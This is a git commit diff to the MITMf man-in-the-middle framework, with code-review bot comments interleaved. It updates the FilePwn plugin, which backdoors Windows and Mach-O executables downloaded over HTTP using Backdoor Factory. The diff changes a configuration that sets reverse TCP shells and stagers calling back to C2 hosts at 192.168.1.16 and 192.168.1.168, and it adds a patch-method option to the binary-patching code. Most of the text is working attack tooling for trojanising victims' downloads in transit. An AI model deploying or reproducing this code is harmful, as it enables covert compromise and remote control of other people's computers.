Updated FilePwn plugin with latest BDFProxy version
Removed exception handling in mitmf.py since I actually want a traceback
parent
4dd497d8b9
commit
5e9158ce0a
5 changed files with 59 additions and 50 deletions
|
@ -363,6 +363,7 @@
|
||||||
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
|
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
|
||||||
|
|
||||||
CompressedFiles = True #True/False
|
CompressedFiles = True #True/False
|
||||||
|
|
||||||
[[[[LinuxIntelx86]]]]
|
[[[[LinuxIntelx86]]]]
|
||||||
SHELL = reverse_shell_tcp # This is the BDF syntax
|
SHELL = reverse_shell_tcp # This is the BDF syntax
|
||||||
HOST = 192.168.1.168 # The C2
|
HOST = 192.168.1.168 # The C2
|
||||||
|
@ -378,10 +379,12 @@
|
||||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||||
|
|
||||||
[[[[WindowsIntelx86]]]]
|
[[[[WindowsIntelx86]]]]
|
||||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
|
||||||
|
# PATCH_METHOD overwrites PATCH_TYPE with jump
|
||||||
|
PATCH_METHOD = automatic
|
||||||
HOST = 192.168.1.16
|
HOST = 192.168.1.16
|
||||||
PORT = 4444
|
PORT = 8443
|
||||||
SHELL = reverse_tcp_stager
|
SHELL = iat_reverse_tcp_stager_threaded
|
||||||
SUPPLIED_SHELLCODE = None
|
SUPPLIED_SHELLCODE = None
|
||||||
ZERO_CERT = False
|
ZERO_CERT = False
|
||||||
PATCH_DLL = True
|
PATCH_DLL = True
|
||||||
|
@ -389,10 +392,12 @@
|
||||||
|
|
||||||
[[[[WindowsIntelx64]]]]
|
[[[[WindowsIntelx64]]]]
|
||||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||||
|
# PATCH_METHOD overwrites PATCH_TYPE with jump
|
||||||
|
PATCH_METHOD = automatic
|
||||||
HOST = 192.168.1.16
|
HOST = 192.168.1.16
|
||||||
PORT = 8088
|
PORT = 8088
|
||||||
SHELL = reverse_shell_tcp
|
SHELL = iat_reverse_tcp_stager_threaded
|
||||||
SUPPLIED_SHELLCODE = Nonepatchpatchpatch
|
SUPPLIED_SHELLCODE = None
|
||||||
ZERO_CERT = True
|
ZERO_CERT = True
|
||||||
PATCH_DLL = False
|
PATCH_DLL = False
|
||||||
MSFPAYLOAD = windows/x64/shell_reverse_tcp
|
MSFPAYLOAD = windows/x64/shell_reverse_tcp
|
||||||
|
|
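Review bot: The new comment `# PATCH_METHOD overwrites PATCH_TYPE with jump` does not say which value triggers the override, and in `[[[[WindowsIntelx86]]]]` it sits right under a `PATCH_TYPE` that this same commit changes to `SINGLE`. The plugin code on this page forces the jump behaviour only when the value is `automatic`, so with the shipped defaults the `PATCH_TYPE` edit appears to have no effect. Wording the comment as `# PATCH_METHOD = automatic overrides PATCH_TYPE (forces JUMP)` in both Windows sections would make that visible to whoever edits the file next.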
|
@ -1 +1 @@
|
||||||
Subproject commit 9ce83ead5ddc4daa798b0f144b3cfeece6809c19
|
Subproject commit e6af51b0c921e7c3dd5bb10a0d7b3983f46ca32b
|
|
@ -1 +1 @@
|
||||||
Subproject commit e7a69e46c13f77c90300965a0897d13de6437f78
|
Subproject commit 137e8eea61ef3c3d0426312a72894d6a4ed32cef
|
30
mitmf.py
30
mitmf.py
|
@ -149,26 +149,22 @@ print "[*] MITMf v%s online... initializing plugins" % mitmf_version
|
||||||
load = []
|
load = []
|
||||||
|
|
||||||
for p in plugins:
|
for p in plugins:
|
||||||
try:
|
|
||||||
|
|
||||||
if vars(args)[p.optname] is True:
|
if vars(args)[p.optname] is True:
|
||||||
print "|_ %s v%s" % (p.name, p.version)
|
print "|_ %s v%s" % (p.name, p.version)
|
||||||
if hasattr(p, 'tree_output') and p.tree_output:
|
if hasattr(p, 'tree_output') and p.tree_output:
|
||||||
for line in p.tree_output:
|
for line in p.tree_output:
|
||||||
print "| |_ %s" % line
|
print "| |_ %s" % line
|
||||||
p.tree_output.remove(line)
|
p.tree_output.remove(line)
|
||||||
|
|
||||||
if getattr(args, p.optname):
|
if getattr(args, p.optname):
|
||||||
p.initialize(args)
|
p.initialize(args)
|
||||||
load.append(p)
|
load.append(p)
|
||||||
|
|
||||||
if vars(args)[p.optname] is True:
|
if vars(args)[p.optname] is True:
|
||||||
if hasattr(p, 'tree_output') and p.tree_output:
|
if hasattr(p, 'tree_output') and p.tree_output:
|
||||||
for line in p.tree_output:
|
for line in p.tree_output:
|
||||||
print "| |_ %s" % line
|
print "| |_ %s" % line
|
||||||
|
|
||||||
except Exception:
|
|
||||||
print "[-] Error loading plugin %s: %s" % (p.name, PrintException())
|
|
||||||
|
|
||||||
#Plugins are ready to go, start MITMf
|
#Plugins are ready to go, start MITMf
|
||||||
if args.disproxy:
|
if args.disproxy:
|
||||||
|
|
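Review bot: `p.tree_output.remove(line)` runs inside `for line in p.tree_output:`, so the list shrinks while it is being iterated and every second entry is skipped, neither printed nor removed; the commit carries this loop over unchanged. It goes unnoticed only while a plugin has a single entry, as FilePwn's `tree_output` does. Iterating over a copy, `for line in p.tree_output[:]:`, or printing everything and then clearing with `del p.tree_output[:]`, avoids the skip. Indentation is lost in this rendering, so the nesting is inferred from the statement order, and the plugin loop continues outside the hunk.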
|
@ -78,7 +78,7 @@ class FilePwn(Plugin):
|
||||||
optname = "filepwn"
|
optname = "filepwn"
|
||||||
desc = "Backdoor executables being sent over http using bdfactory"
|
desc = "Backdoor executables being sent over http using bdfactory"
|
||||||
implements = ["handleResponse"]
|
implements = ["handleResponse"]
|
||||||
tree_output = ["BDFProxy v0.2 online"]
|
tree_output = ["BDFProxy v0.3.2 online"]
|
||||||
version = "0.2"
|
version = "0.2"
|
||||||
has_opts = False
|
has_opts = False
|
||||||
|
|
||||||
|
@ -123,8 +123,6 @@ class FilePwn(Plugin):
|
||||||
self.zipblacklist = self.userConfig['ZIP']['blacklist']
|
self.zipblacklist = self.userConfig['ZIP']['blacklist']
|
||||||
self.tarblacklist = self.userConfig['TAR']['blacklist']
|
self.tarblacklist = self.userConfig['TAR']['blacklist']
|
||||||
|
|
||||||
self.output.append("BDFProxy by midnite_runr online")
|
|
||||||
|
|
||||||
def convert_to_Bool(self, aString):
|
def convert_to_Bool(self, aString):
|
||||||
if aString.lower() == 'true':
|
if aString.lower() == 'true':
|
||||||
return True
|
return True
|
||||||
|
@ -167,6 +165,10 @@ class FilePwn(Plugin):
|
||||||
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
|
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
|
||||||
cave_jumping = True
|
cave_jumping = True
|
||||||
|
|
||||||
|
# if automatic override
|
||||||
|
if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic':
|
||||||
|
cave_jumping = True
|
||||||
|
|
||||||
targetFile = pebin.pebin(FILE=binaryFile,
|
targetFile = pebin.pebin(FILE=binaryFile,
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
SHELL=self.WindowsIntelx64['SHELL'],
|
SHELL=self.WindowsIntelx64['SHELL'],
|
||||||
|
@ -178,6 +180,7 @@ class FilePwn(Plugin):
|
||||||
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
|
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
|
||||||
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
|
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
|
||||||
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
|
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
|
||||||
|
PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower()
|
||||||
)
|
)
|
||||||
|
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
|
@ -193,6 +196,10 @@ class FilePwn(Plugin):
|
||||||
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
|
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
|
||||||
cave_jumping = True
|
cave_jumping = True
|
||||||
|
|
||||||
|
# if automatic override
|
||||||
|
if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic':
|
||||||
|
cave_jumping = True
|
||||||
|
|
||||||
targetFile = pebin.pebin(FILE=binaryFile,
|
targetFile = pebin.pebin(FILE=binaryFile,
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
SHELL=self.WindowsIntelx86['SHELL'],
|
SHELL=self.WindowsIntelx86['SHELL'],
|
||||||
|
@ -203,7 +210,8 @@ class FilePwn(Plugin):
|
||||||
IMAGE_TYPE=self.WindowsType,
|
IMAGE_TYPE=self.WindowsType,
|
||||||
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
|
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
|
||||||
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
|
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
|
||||||
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT'])
|
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']),
|
||||||
|
PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower()
|
||||||
)
|
)
|
||||||
|
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
|
@ -236,7 +244,7 @@ class FilePwn(Plugin):
|
||||||
)
|
)
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
|
|
||||||
elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
|
elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
|
||||||
targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
|
targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
|
||||||
targetFile.support_check()
|
targetFile.support_check()
|
||||||
|
|
||||||
|
@ -245,29 +253,29 @@ class FilePwn(Plugin):
|
||||||
if targetFile.FAT_FILE is True:
|
if targetFile.FAT_FILE is True:
|
||||||
if self.FatPriority == 'x86':
|
if self.FatPriority == 'x86':
|
||||||
targetFile = machobin.machobin(FILE=binaryFile,
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
OUTPUT = os.path.basename(binaryFile),
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
SHELL=self.MachoIntelx86['SHELL'],
|
SHELL=self.MachoIntelx86['SHELL'],
|
||||||
HOST=self.MachoIntelx86['HOST'],
|
HOST=self.MachoIntelx86['HOST'],
|
||||||
PORT=int(self.MachoIntelx86['PORT']),
|
PORT=int(self.MachoIntelx86['PORT']),
|
||||||
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
|
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
|
||||||
FAT_PRIORITY=self.FatPriority
|
FAT_PRIORITY=self.FatPriority
|
||||||
)
|
)
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
|
|
||||||
elif self.FatPriority == 'x64':
|
elif self.FatPriority == 'x64':
|
||||||
targetFile = machobin.machobin(FILE=binaryFile,
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
OUTPUT = os.path.basename(binaryFile),
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
SHELL=self.MachoIntelx64['SHELL'],
|
SHELL=self.MachoIntelx64['SHELL'],
|
||||||
HOST=self.MachoIntelx64['HOST'],
|
HOST=self.MachoIntelx64['HOST'],
|
||||||
PORT=int(self.MachoIntelx64['PORT']),
|
PORT=int(self.MachoIntelx64['PORT']),
|
||||||
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
|
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
|
||||||
FAT_PRIORITY=self.FatPriority
|
FAT_PRIORITY=self.FatPriority
|
||||||
)
|
)
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
|
|
||||||
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
|
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
|
||||||
targetFile = machobin.machobin(FILE=binaryFile,
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
OUTPUT = os.path.basename(binaryFile),
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
SHELL=self.MachoIntelx86['SHELL'],
|
SHELL=self.MachoIntelx86['SHELL'],
|
||||||
HOST=self.MachoIntelx86['HOST'],
|
HOST=self.MachoIntelx86['HOST'],
|
||||||
PORT=int(self.MachoIntelx86['PORT']),
|
PORT=int(self.MachoIntelx86['PORT']),
|
||||||
|
@ -276,9 +284,9 @@ class FilePwn(Plugin):
|
||||||
)
|
)
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
|
|
||||||
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
|
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
|
||||||
targetFile = machobin.machobin(FILE=binaryFile,
|
targetFile = machobin.machobin(FILE=binaryFile,
|
||||||
OUTPUT = os.path.basename(binaryFile),
|
OUTPUT=os.path.basename(binaryFile),
|
||||||
SHELL=self.MachoIntelx64['SHELL'],
|
SHELL=self.MachoIntelx64['SHELL'],
|
||||||
HOST=self.MachoIntelx64['HOST'],
|
HOST=self.MachoIntelx64['HOST'],
|
||||||
PORT=int(self.MachoIntelx64['PORT']),
|
PORT=int(self.MachoIntelx64['PORT']),
|
||||||
|
@ -286,7 +294,7 @@ class FilePwn(Plugin):
|
||||||
FAT_PRIORITY=self.FatPriority
|
FAT_PRIORITY=self.FatPriority
|
||||||
)
|
)
|
||||||
result = targetFile.run_this()
|
result = targetFile.run_this()
|
||||||
|
|
||||||
self.patched.put(result)
|
self.patched.put(result)
|
||||||
return
|
return
|
||||||
|
|
||||||
|
@ -464,7 +472,7 @@ class FilePwn(Plugin):
|
||||||
patchCount = 0
|
patchCount = 0
|
||||||
|
|
||||||
wasPatched = False
|
wasPatched = False
|
||||||
|
|
||||||
for info in zippyfile.infolist():
|
for info in zippyfile.infolist():
|
||||||
print "[*] >>> Next file in zipfile:", info.filename
|
print "[*] >>> Next file in zipfile:", info.filename
|
||||||
|
|
||||||
|
|
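Review bot: `self.WindowsIntelx64['PATCH_METHOD'].lower()` and the matching `WindowsIntelx86` lookups index a key that this commit introduces, so a user config written for the previous version raises `KeyError` in the `# if automatic override` check and again in the `pebin.pebin(...)` call. Reading the value once per branch with a fallback, `patch_method = self.WindowsIntelx64.get('PATCH_METHOD', DEFAULT_PATCH_METHOD).lower()`, and reusing `patch_method` in both places would keep older configs loading; `DEFAULT_PATCH_METHOD` would be a new constant holding whatever value preserves the pre-commit behaviour, and this assumes the section object supports `.get`. The x86 and x64 branches are near-identical, so the same change applies to both. The enclosing method starts and ends outside these hunks.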